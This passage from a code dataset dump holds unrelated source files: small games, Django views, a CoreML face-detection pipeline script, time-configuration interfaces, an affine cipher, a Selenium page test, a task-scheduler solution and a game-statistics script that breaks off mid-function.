        # Map config_id -> summed price_total from the grouped result.
        rg_results = dict((d['config_id'][0], d['price_total']) for d in data)
        for team in self:
            team.pos_order_amount_total = sum([
                rg_results.get(config.id, 0.0)
                for config in team.pos_config_ids
            ])
|
13,129 | e2a1be7c4bb343b0b21dce9641653db46eeb405d | # -*- coding: utf-8 -*-
import sys
import time
reload(sys)
sys.setdefaultencoding('utf-8')
class obj:
    """Demonstrates @property getter/setter/deleter access to a private attribute."""
    def __init__(self,name,age):
        self.__name=name
        self.__age=age
    # Keep these as private (name-mangled) attributes
    @property
    def age(self):
        # Read access: a.age goes through this getter.
        return self.__age
    @age.setter
    def age(self,value):
        # Assignment: only accept integers; anything else raises.
        if isinstance(value,int):
            self.__age=value
        else:
            raise ValueError('非整数类型')
    @age.deleter
    def age(self):
        # Deletion hook: runs on `del a.age`.
        print 'delete over'
a = obj('langzi',18)
# With these decorators the methods are used through plain attribute syntax.
print a.age
# Direct read: goes through the property getter and returns age.
a.age=20
# Assignment: routed through the setter, which validates the value.
print a.age
del a.age
# Deletes age via the deleter.
# Method calls disguised as attribute access; this pattern appears often in the Django source.
|
13,130 | d7be37c80b36d07e5b1269b145e33b88e198cb7d | import pygame as pg
# Directory holding all image/level assets.
FILEDIR = 'data'

# Tile textures keyed by logical tile type.
# NOTE(review): pg.image.load at module import time assumes pygame is
# usable before pg.init() runs in __main__ — confirm on target platforms.
tile_images = {
    'wall': pg.image.load('{}/box.png'.format(FILEDIR)),
    'empty': pg.image.load('{}/grass.png'.format(FILEDIR))
}
player_image = pg.image.load('{}/mario.png'.format(FILEDIR))

# Size of one map cell in pixels.
tile_width = tile_height = 50
player = None

# sprite groups
all_sprites = pg.sprite.Group()
tiles_group = pg.sprite.Group()
player_group = pg.sprite.Group()
def generate_level(level):
    """Instantiate tiles and the player from map rows of '.', '#' and '@'.

    Returns (player, x, y) where x and y are the loop variables after the
    last iteration, i.e. the indices of the last cell (field size - 1).
    """
    new_player, x, y = None, None, None
    for y in range(len(level)):
        for x in range(len(level[y])):
            if level[y][x] == '.':
                Tile('empty', x, y)
            elif level[y][x] == '#':
                Tile('wall', x, y, True)
            elif level[y][x] == '@':
                # Player cell also gets a walkable tile underneath.
                Tile('empty', x, y)
                new_player = Player(x, y)
    # return the player, plus the field size in cells
    return new_player, x, y
class Tile(pg.sprite.Sprite):
    """One map cell; is_wall marks cells the player cannot enter."""
    def __init__(self, tile_type, pos_x, pos_y, is_wall=False):
        super().__init__(tiles_group, all_sprites)
        self.image = tile_images[tile_type]
        # Grid coordinates converted to pixel coordinates.
        self.rect = self.image.get_rect().move(
            tile_width * pos_x, tile_height * pos_y)
        self.is_wall = is_wall
class Player(pg.sprite.Sprite):
    """Player sprite moved one tile per arrow-key press; walls block movement."""

    def __init__(self, pos_x, pos_y):
        super().__init__(player_group, all_sprites)
        self.image = player_image
        # Small pixel offset centers the sprite inside its tile.
        self.rect = self.image.get_rect().move(
            tile_width * pos_x + 15, tile_height * pos_y + 5)
        self.speed = 50
        self.vel = pg.math.Vector2((0, 0))

    def _hits_wall(self):
        """True when the sprite currently overlaps a wall tile.

        NOTE(review): like the original code, this assumes the player always
        overlaps at least one level tile, so spritecollideany() never
        returns None here.
        """
        return pg.sprite.spritecollideany(self, tiles_group).is_wall

    def move(self, event):
        """Step one tile in the pressed arrow-key direction, undoing the
        step when it lands on a wall tile (same behavior as the four
        previously copy-pasted branches)."""
        deltas = {
            pg.K_DOWN: (0, self.speed),
            pg.K_UP: (0, -self.speed),
            pg.K_RIGHT: (self.speed, 0),
            pg.K_LEFT: (-self.speed, 0),
        }
        dx, dy = deltas.get(event.key, (0, 0))
        if dx == 0 and dy == 0:
            return
        self.rect.x += dx
        self.rect.y += dy
        if self._hits_wall():
            self.rect.x -= dx
            self.rect.y -= dy
def start_screen(filedir):
    """Draw the intro splash: scaled background plus rules text.

    NOTE(review): relies on the module-level WIDTH, HEIGHT and screen created
    in the __main__ block — must only be called after pg.display.set_mode.
    """
    intro_text = ["ЗАСТАВКА", "",
                  "Правила игры",
                  "Если в правилах несколько строк,",
                  "приходится выводить их построчно"]
    fon = pg.transform.scale(pg.image.load('{}/fon.jpg'.format(filedir)), (WIDTH, HEIGHT))
    screen.blit(fon, (0, 0))
    font = pg.font.Font(None, 30)
    # Render each rules line, stacking downward with a 10px gap.
    text_coord = 50
    for line in intro_text:
        string_rendered = font.render(line, 1, pg.Color('black'))
        intro_rect = string_rendered.get_rect()
        text_coord += 10
        intro_rect.top = text_coord
        intro_rect.x = 10
        text_coord += intro_rect.height
        screen.blit(string_rendered, intro_rect)
def load_level(filename):
    """Read a level map from FILEDIR/filename.

    Strips line endings and right-pads every row with '.' (empty cells) so
    all rows share the width of the longest one.
    """
    path = FILEDIR + "/" + filename
    with open(path, 'r') as map_file:
        rows = [line.strip() for line in map_file]
    widest = max(map(len, rows))
    return [row.ljust(widest, '.') for row in rows]
if __name__ == '__main__':
    pg.init()
    SIZE = WIDTH, HEIGHT = (550, 500)
    screen = pg.display.set_mode(SIZE)
    clock = pg.time.Clock()
    running = True
    # draw_area False -> show splash; any mouse click starts the game.
    draw_area = False
    player, level_x, level_y = generate_level(load_level('map1.txt'))
    while running:
        for event in pg.event.get():
            if event.type == pg.QUIT:
                running = False
            if event.type == pg.MOUSEBUTTONDOWN:
                draw_area = True
            # Arrow keys move the player only once the game has started.
            if event.type == pg.KEYDOWN and draw_area:
                player.move(event)
        screen.fill(pg.Color('black'))
        if not draw_area:
            start_screen(FILEDIR)
        else:
            tiles_group.draw(screen)
            # all_sprites.draw(screen)
            player_group.draw(screen)
        clock.tick(10)
        pg.display.flip()
    pg.quit()
|
13,131 | 449ef3403e52d5a3764d12103a491f0cace6e7fa | """
Project Name: Untitled Zombie Game
File Name: Constants.py
Author: Lex Hall
Last Updated: 11-15-2018
Python Version: 3.6
Pygame Version: 1.9.3
"""
# COLORS #
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
FOG_OF_WAR = (220, 220, 220)
# END COLORS #

# Frame rate and window/map geometry.
FRAME_RATE = 60
WINDOW_X = 800
WINDOW_Y = 800
GAMEMAP_X = 1600
GAMEMAP_Y = 1600

# Player movement constants.
# NOTE(review): units (pixels per tick / degrees per tick) inferred from the
# names — confirm against the movement code that consumes them.
PLAYER_MOVE_SPEED = 1
PLAYER_RUN_SPEED = 2
PLAYER_STRAFE_SPEED = 1
PLAYER_TURN_SPEED = 4
13,132 | f23508b5cef88d4163548d64ba560147f3b14ba5 | from rest_framework.generics import ListAPIView, CreateAPIView
from .models import NumberCounter
from .serializers import UnpairedSerializer, NumberCounterSerializer
class UnpairedAPIView(CreateAPIView):
    """
    API view for submitting a data list via the POST method.
    """
    serializer_class = UnpairedSerializer
class StatisticAPIView(ListAPIView):
    """
    API view that lists the stored number-counter statistics.
    """
    queryset = NumberCounter.objects.all()
    serializer_class = NumberCounterSerializer
|
13,133 | e75da6623edb33177a9c30e11fc345ccb1604edd | """
this file takes the converted blazeface coreml model from convert_blazeface.py
and adds Non-maximum suppresion to create a pipeline.
currently multiple outputs in coreML with tf2.0 Keras is not working so working around to change the single
output in coreml to multiple output
"""
import coremltools
from coremltools.models import datatypes
from coremltools.models.pipeline import *
from PIL import Image
# Toggle for also exposing the 12 landmark channels as an output.
include_landmarks = False

blazeface_coreml = coremltools.models.MLModel("./coreml_models/blazeface.mlmodel")
# Drop the converted model's last output and last layer; they are rebuilt
# below as explicit slice + squeeze layers.
blazeface_coreml._spec.description.output.pop(-1)
blazeface_coreml._spec.neuralNetwork.layers.pop(-1)
# adding the boxes output layer: slice channels [0:4) out of the
# (1, 896, 16) concatenated prediction tensor
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "boxes_pre"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("model/concatenate_3/concat")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 16])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([1,896, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.strides.extend([1,1,1])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginIds.extend([0, 0, 0])
# endIds uses INT32_MAX sentinels where the end mask is set.
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endIds.extend([2147483647, 2147483647, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginMasks.extend([True, True, True])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endMasks.extend([True, True, False])
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("boxes_pre")
# squeezing the leading batch dimension: (1, 896, 4) -> (896, 4)
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "boxes"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("boxes_pre")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 2
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([896, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.squeezeAll = True
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("boxes")
#creating the landmarks output layer
confidence_index = -6
if include_landmarks:
confidence_index = -8
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "landmarks_pre"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("model/concatenate_3/concat")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 16])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([1,896, 12])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.strides.extend([1,1,1])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginIds.extend([0, 0, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endIds.extend([2147483647, 2147483647, 16])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginMasks.extend([True, True, False])
# --- Landmark head: finish the sliceStatic layer, then squeeze (1, 896, 12) -> (896, 12) ---
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endMasks.extend([True, True, True])
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("landmarks_pre")
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "landmarks"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("landmarks_pre")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 12])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 2
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([896, 12])
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.squeezeAll = True
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("landmarks")
# creating a new layer by squeezing confidence output
# NOTE(review): this layer first sets sliceStatic then assigns squeeze.squeezeAll;
# in the layer's oneof the last-assigned field (squeeze) determines the layer type -- confirm intended.
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "box_confidence"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append(blazeface_coreml._spec.neuralNetwork.layers[confidence_index].output[0])
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 1])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 2
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([896, 1])
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.squeezeAll = True
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("box_confidence")
#adding the output nodes to description
#adding box score layers
blazeface_coreml._spec.description.output.add()
blazeface_coreml._spec.description.output[0].name = "box_confidence"
blazeface_coreml._spec.description.output[0].type.multiArrayType.shape.extend([896, 1])
blazeface_coreml._spec.description.output[0].type.multiArrayType.dataType = datatypes._FeatureTypes_pb2.ArrayFeatureType.DOUBLE
#adding box output
blazeface_coreml._spec.description.output.add()
blazeface_coreml._spec.description.output[1].name = "boxes"
blazeface_coreml._spec.description.output[1].type.multiArrayType.shape.extend([896, 4])
blazeface_coreml._spec.description.output[1].type.multiArrayType.dataType = datatypes._FeatureTypes_pb2.ArrayFeatureType.DOUBLE
#adding landmark output
if include_landmarks:
    blazeface_coreml._spec.description.output.add()
    blazeface_coreml._spec.description.output[2].name = "landmarks"
    blazeface_coreml._spec.description.output[2].type.multiArrayType.shape.extend([896, 12])
    blazeface_coreml._spec.description.output[2].type.multiArrayType.dataType = datatypes._FeatureTypes_pb2.ArrayFeatureType.DOUBLE
# --- Non-maximum-suppression model: inputs mirror the detector's first two outputs ---
nms_spec = coremltools.proto.Model_pb2.Model()
nms_spec.specificationVersion = 3
for i in range(2):
    blazeface_output = blazeface_coreml._spec.description.output[i].SerializeToString()
    nms_spec.description.input.add()
    nms_spec.description.input[i].ParseFromString(blazeface_output)
    nms_spec.description.output.add()
    nms_spec.description.output[i].ParseFromString(blazeface_output)
nms_spec.description.output[0].name = "confidence"
nms_spec.description.output[1].name = "coordinates"
# NMS keeps a variable number of boxes: first dim unbounded, second fixed (1 score / 4 coords).
output_sizes = [1, 4]
for i in range(2):
    ma_type = nms_spec.description.output[i].type.multiArrayType
    ma_type.shapeRange.sizeRanges.add()
    ma_type.shapeRange.sizeRanges[0].lowerBound = 0
    ma_type.shapeRange.sizeRanges[0].upperBound = -1
    ma_type.shapeRange.sizeRanges.add()
    ma_type.shapeRange.sizeRanges[1].lowerBound = output_sizes[i]
    ma_type.shapeRange.sizeRanges[1].upperBound = output_sizes[i]
    del ma_type.shape[:]
nms = nms_spec.nonMaximumSuppression
nms.confidenceInputFeatureName = "box_confidence"
nms.coordinatesInputFeatureName = "boxes"
nms.confidenceOutputFeatureName = "confidence"
nms.coordinatesOutputFeatureName = "coordinates"
nms.iouThresholdInputFeatureName = "iouThreshold"
nms.confidenceThresholdInputFeatureName = "confidenceThreshold"
# Defaults used when the optional threshold inputs are not supplied at predict time.
default_iou_threshold = 0.5
default_confidence_threshold = 0.75
nms.iouThreshold = default_iou_threshold
nms.confidenceThreshold = default_confidence_threshold
nms.stringClassLabels.vector.extend(["face"])
nms_model = coremltools.models.MLModel(nms_spec)
# --- Pipeline: detector -> NMS; thresholds exposed as optional pipeline inputs ---
input_features = [("input_image", datatypes.Array(3,128,128)), ("iouThreshold", datatypes.Double()),
                  ("confidenceThreshold", datatypes.Double())] #cannot directly pass imageType as input type here.
output_features = [ "confidence", "coordinates"]
pipeline = Pipeline(input_features, output_features)
pipeline.add_model(blazeface_coreml._spec)
pipeline.add_model(nms_model._spec)
# Copy the detector's real (image) input description over the placeholder array input.
pipeline.spec.description.input[0].ParseFromString(blazeface_coreml._spec.description.input[0].SerializeToString())
pipeline.spec.description.input[1].type.isOptional = True
pipeline.spec.description.input[2].type.isOptional = True
pipeline.spec.description.output[0].ParseFromString(nms_model._spec.description.output[0].SerializeToString())
pipeline.spec.description.output[1].ParseFromString(nms_model._spec.description.output[1].SerializeToString())
final_model = coremltools.models.MLModel(pipeline.spec)
final_model.save("./coreml_models/blazeface_pipeline.mlmodel")
# Smoke test: run one 128x128 image through the saved pipeline.
inp_image = Image.open("./sample.jpg")
inp_image = inp_image.resize((128, 128))
predictions = final_model.predict({'input_image': inp_image}, useCPUOnly=True)
print(predictions)
13,134 | 03bac25624fd29f5dbbcbf7454556ce420f58e20 | import time
import datetime
import cflw代码库py.cflw时间 as 时间
def f解析日期时间(a):
    """Normalize *a* (time.struct_time or datetime.datetime) to a time.struct_time."""
    if isinstance(a, datetime.datetime):
        return a.timetuple()
    if isinstance(a, time.struct_time):
        return a
    raise TypeError("无法解析的类型")
def f解析时区(a):
"""把datetime.tzinfo对象原封不动返回
把"时区名±时:分"解析成datetime.timezone对象"""
if isinstance(a, datetime.tzinfo):
return a
elif isinstance(a, 时间.S时区):
return a.ft标准库时区()
elif type(a) == str:
v符号位置 = max(a.find("+"), a.find("-"))
if v符号位置 < 0:
raise ValueError("格式错误, 找不到正负号")
elif v符号位置: #v符号位置 > 0
v时区名 = a[: v符号位置].strip()
else: #v符号位置 == 0
v时区名 = None
v冒号位置 = a.find(":", v符号位置)
if v冒号位置 < 0:
v时 = int(a[v符号位置+1 :])
v分 = 0
else:
v时 = int(a[v符号位置+1 : v冒号位置])
v分 = int(a[v冒号位置+1 :])
return datetime.timezone(datetime.timedelta(hours = v时, minutes = v分), v时区名)
else:
raise TypeError("无法解析的类型")
def f拆分时区(a时区):
    """Split a datetime.tzinfo into (zone name, sign-is-positive, hours, minutes)."""
    v秒 = a时区.utcoffset(None).total_seconds()
    v正 = v秒 >= 0
    # 时间.f总秒拆成时分秒 expects a non-negative total; the sign is carried separately.
    v时分秒 = 时间.f总秒拆成时分秒(abs(v秒))
    return a时区.tzname(None), v正, v时分秒[0], v时分秒[1]
def f解析并拆分时区(a时区):
    """Parse *a时区* (see f解析时区) and split it (see f拆分时区) in one call."""
    return f拆分时区(f解析时区(a时区))
class I时间显示:
    """Read-only interface: implementors report a device's current time and zone."""

    def f显示_时间(self):
        """Return a time.struct_time object."""
        raise NotImplementedError()

    def f显示_时区(self):
        """Return a datetime.timezone object."""
        raise NotImplementedError()
class I时间配置:
    """Interface for configuring a device's date/time and timezone."""

    c模式名 = "时间配置模式"

    def fs为系统时间(self):
        """Copy the host system's current timezone and local time to the device."""
        self.fs时区(时间.S时区.fc系统时区())
        self.fs日期时间(time.localtime())

    def fs日期时间(self, a日期时间):
        """Set the device date/time."""
        raise NotImplementedError()

    def fs时区(self, a时区):
        """Set the device timezone.

        Accepts datetime.tzinfo objects or strings of the form "name±HH:MM".
        """
        raise NotImplementedError()
13,135 | 39796e6309e0e99e32b0cb513c0144780847dcc9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from . import MonoSubCipher
from utils.alphabet import *
class AffineCipher(MonoSubCipher):
    """Monoalphabetic affine cipher: each symbol x maps to m*x + b over the alphabet."""

    def __init__(self, alphabet, m, b):
        # NOTE(review): decryption never uses an explicit "inverse" transform here;
        # the substitution alphabet is built once from m*x + b.
        super(AffineCipher, self).__init__(alphabet, alphabet.affinal(m, b))
|
13,136 | 801a861f2d8fab540fb6225be46064eb4f81564a | # -*- coding:utf-8 -*-
from titan import tt_check
from taocheM.base_m import Base
from taocheM.config_m import TestConfig
from taocheM.locator_m import CarDetail_Locator
from time import sleep
from titan.tt_log import LOG
from titan import SeleniumDriver
# Fixed detail-page URL used by every check in this suite.
detail_url = 'https://m.taoche.com/buycar/b-dealermd233736134t.html'
# Detail page: checks performed after opening the "inspection report" (检测报告) section.
class Report(Base):
    def test_report_title(self):
        """Verify the inspection-report tab shows the correct title. @author:zhangyanli"""
        self.driver.get(detail_url)
        sleep(2)  # crude wait for the page to render
        # Scroll down so the report section is loaded into view (lazy rendering).
        self.driver.execute_script("window.scrollTo(0, 1300)")
        report_title = self.driver.find_element(CarDetail_Locator.REPORT_TITLE).text
        tt_check.assertEqual("检测报告", report_title, "检测报告tab的title,期望是检测报告,实际是%s" % report_title)
    def test_report_type(self):
        """Verify each category row of the inspection report renders correctly. @author:zhangyanli"""
        self.driver.get(detail_url)
        sleep(2)
        self.driver.execute_script("window.scrollTo(0, 1300)")
        report_type = self.driver.find_element(CarDetail_Locator.REPORT_TYPE).find_elements_by_class_name('display-flex')
        # for i in range(len(report_type)):
        #     LOG.info(report_type[i].text)
        for i in range(len(report_type)):
            config_value = report_type[i].find_elements_by_tag_name('div')
            keyval = ""
            # Cells alternate label/value: even index = label, odd index = its value.
            for j in range(len(config_value)):
                yu = j % 2
                if(yu == 0):
                    keyval = config_value[j].text
                else:
                    keyval = keyval + ":" + config_value[j].text
                    print(keyval)
                    keyval = ""
|
13,137 | aa51f8cc9a11e4b4242d1ba15bd82113bd3fe4b9 | """
Given a char array representing tasks CPU need to do. It contains capital letters A to Z where different letters represent different tasks.Tasks could be done without original order. Each task could be done in one interval. For each interval, CPU could finish one task or just be idle.
However, there is a non-negative cooling interval n that means between two same tasks, there must be at least n intervals that CPU are doing different tasks or just be idle.
You need to return the least number of intervals the CPU will take to finish all the given tasks.
Example 1:
Input: tasks = ["A","A","A","B","B","B"], n = 2
Output: 8
Explanation: A -> B -> idle -> A -> B -> idle -> A -> B.
Note:
The number of tasks is in the range [1, 10000].
The integer n is in the range [0, 100].
"""
"""
Time O(N)
Space O(1)
先统计数组中各个任务出现的次数。优先安排次数最多的任务。次数最多的任务安排完成之后所需的时间间隔为(max(次数)-1)*(n+1)+ p(频率最高出现的p个数p>=1)。其余任务直接插空即可。
https://www.youtube.com/watch?v=YCD_iYxyXoo
特殊情况:如果不需要插入任何idle就能把所有task安排完,那么返回的就是task的长度
"""
class Solution(object):
    def leastInterval(self, tasks, n):
        """Return the minimum number of CPU intervals to finish *tasks* with a
        cooldown of *n* intervals between two identical tasks.
        """
        # Frequency of each task label.
        freq = {}
        for task in tasks:
            freq[task] = freq.get(task, 0) + 1
        top = max(freq.values())
        # Number of distinct tasks tied at the highest frequency.
        ties = sum(1 for c in freq.values() if c == top)
        # Frame bound: (top - 1) full frames of length n + 1, plus one closing
        # slot per most-frequent task.
        framed = (top - 1) * (n + 1) + ties
        # If tasks are plentiful enough, no idle slots are needed at all.
        return max(framed, len(tasks))
|
13,138 | a8b3fa2e3254b1d8037fd787dcf67cf43227c261 | import math
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats
# Pickled DataFrame of per-event game records; loaded once at import time.
data = pd.read_pickle("data.pkl")
# print(str(data))
# columns=["game_mode", "observability", "agents", "game_seed", "instance", "event_id", "event_data"]
# Event id: [bomb, death, pickup]
# Event data bomb: (tick, relative_tick, agent_id, x, y)
# Event data death: (tick, relative_tick, agent_id, x, y, killer, stuck)
# Event data pickup: (tick, relative_tick, agent_id, x, y, pickup)
# Agent-type ids used in the "agents" column, and their display names.
agent_mapping = {2: "OSLA", 3: "RuleBased", 4: "RHEA", 6: "MCTS"}
agents = [2, 3, 4, 6]
mode_mapping = {0: "FFA", 1: "TEAM"}
game_seeds = [93988, 19067, 64416, 83884, 55636, 27599, 44350, 87872, 40815, 11772, 58367, 17546, 75375, 75772, 58237,
              30464, 27180, 23643, 67054, 19508]
pick_ups = ["CAN KICK", "BLAST STRENGTH", "AMMO"]
# Vision ranges; -1 presumably means full observability (plotted as infinity below) -- confirm.
obs_options = [1, 2, 4, -1]
# colors = {2: "b", 3: "orange", 4: "g", 6: "r"}
# One plot color per agent type, in the same order as `agents`.
colors = ["b", "orange", "g", "r"]
def suicide_query(game_mode=0, observability=-1, game_seed=-1, agent=-1):
    """
    Calculates the suicide rate for a type of agent given game mode, observability, and game seed.

    If game_seed is -1, all game seeds are aggregated. If agent is -1, no
    agent-type filter is applied to the game selection.

    Returns:
        (mean suicides per appearance * 100, 95% confidence half-width * 100)
    """
    event_id = "death"
    # Keep only those games within given configuration
    if game_seed != -1:
        selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability) &
                             (data['game_seed'] == game_seed)]
    else:
        selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability)]
    if agent != -1:
        # NOTE(review): rows are dropped from `selection` while iterating it -- works
        # here because iterrows yields copies, but fragile; consider boolean masking.
        for index, row in selection.iterrows():
            if agent not in row["agents"]:
                selection.drop(index, inplace=True)
    # print(selection.size)
    team_kill_count = []
    ngames = 0  # Number of agent appearances examined (one per matching agent slot)
    suicides = 0  # Total suicide events across all appearances
    events_per_sample = []  # Suicide count per appearance, for the variance estimate
    team_kills = 0
    # Iterate through selected game data
    for index, row in selection.iterrows():
        if agent in row["agents"] and row['event_id'] == event_id:  # This agent played in the game
            # Find its agent ID depending on its position in the agent list. There may be more than 1 agent of this
            # type in the game, so iterate over all and check individually.
            ll = row["agents"]
            indices = [i for i, el in enumerate(ll) if el == agent]
            for agent_id in indices:
                # teammate = (agent_id + 2) % 4
                sample_event_counter = 0
                for event in row["event_data"]:
                    if event["agent_id"] == agent_id:  # This agent dies
                        if event["killer"] == agent_id:  # Suicide
                            sample_event_counter += 1
                        # if event["killer"] == teammate:  # Killed by teammate
                        #     team_kills += 1
                    # if event["agent_id"] == teammate:  # Teammate dies
                    #     if event["killer"] == agent_id:  # Killed by this agent
                    #         team_kill_count += 1
                ngames += 1
                events_per_sample.append(sample_event_counter)
                suicides += sample_event_counter
    # suicide_count.append(100*suicides/ngames)  # Showing percentage of game suicides
    # team_kill_count.append(100*team_kills/games)
    # percentage = 100 * suicides / ngames
    # mean = ngames * (percentage / 100)
    # variance = mean * (1 - (percentage / 100))
    # std_dev = math.sqrt(variance)
    # std_err = std_dev / math.sqrt(ngames)
    # h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1)  # 95 confidence interval
    # return percentage, h
    # print(events_per_sample)
    mean = suicides/ngames
    # Population variance of the per-appearance counts.
    variance = sum([pow(x - mean, 2) for x in events_per_sample])/len(events_per_sample)
    std_dev = math.sqrt(variance)
    std_err = std_dev/math.sqrt(len(events_per_sample))
    # 1.95 / 2 = 0.975: the upper quantile for a two-sided 95% t interval.
    h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1)  # 95% confidence interval
    return mean * 100, h * 100  # , team_kill_count
def event_count_query(event_id, game_mode=0, observability=-1, game_seed=-1, agent=-1):
    """Average events of *event_id* per appearance of *agent* in the configured games.

    Same selection logic as suicide_query; returns
    (mean events per appearance, 95% confidence half-width).
    """
    # Keep only those games within given configuration
    if game_seed != -1:
        selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability) &
                             (data['game_seed'] == game_seed)]
    else:
        selection = data.loc[(data['game_mode'] == game_mode) & (data['observability'] == observability)]
    if agent != -1:
        # NOTE(review): drops rows while iterating (see suicide_query).
        for index, row in selection.iterrows():
            if agent not in row["agents"]:
                selection.drop(index, inplace=True)
    ngames = 0  # Number of agent appearances examined
    event_counter = 0  # Total matching events across all appearances
    events_per_sample = []  # Event count per appearance, for the variance estimate
    # Iterate through selected game data
    for index, row in selection.iterrows():
        if agent in row["agents"] and row['event_id'] == event_id:  # This agent played in the game
            ll = row["agents"]
            indices = [i for i, el in enumerate(ll) if el == agent]
            for agent_id in indices:
                sample_event_counter = 0
                for event in row["event_data"]:
                    if event["agent_id"] == agent_id:  # Event belongs to this agent
                        sample_event_counter += 1
                ngames += 1
                events_per_sample.append(sample_event_counter)
                event_counter += sample_event_counter
    mean = event_counter/ngames
    variance = sum([pow(x - mean, 2) for x in events_per_sample])/len(events_per_sample)
    std_dev = math.sqrt(variance)
    std_err = std_dev/math.sqrt(len(events_per_sample))
    # 1.95 / 2 = 0.975: upper quantile for a two-sided 95% t interval.
    h = std_err * scipy.stats.t.ppf(1.95 / 2., ngames - 1)  # 95% confidence interval
    return event_counter/ngames, h
def plot_suicides(mode=0):
    """Plot suicide % vs. vision range for every agent type, with shaded 95% CI.

    Saves the figure to suicide_<mode>.png and shows it.
    """
    plot_data = [[] for _ in range(len(agent_mapping))]
    stderr_data = [[] for _ in range(len(agent_mapping))]
    for agent in agents:
        for o in obs_options:
            suicide_rate, stderr = suicide_query(game_mode=mode, observability=o, agent=agent)
            print("Suicides in game mode " + mode_mapping[mode] + ", observability " + str(o))
            plot_data[agents.index(agent)].append(suicide_rate)
            stderr_data[agents.index(agent)].append(stderr)
            print(agent_mapping[agent] + ": " + str(suicide_rate))
    # x positions for obs_options [1, 2, 4, -1]; -1 is plotted at 11 and labeled infinity.
    x = [1, 2, 4, 11]
    xt = ['PO:1', 'PO:2', 'PO:4', '$\infty$']
    for d in range(len(plot_data)):
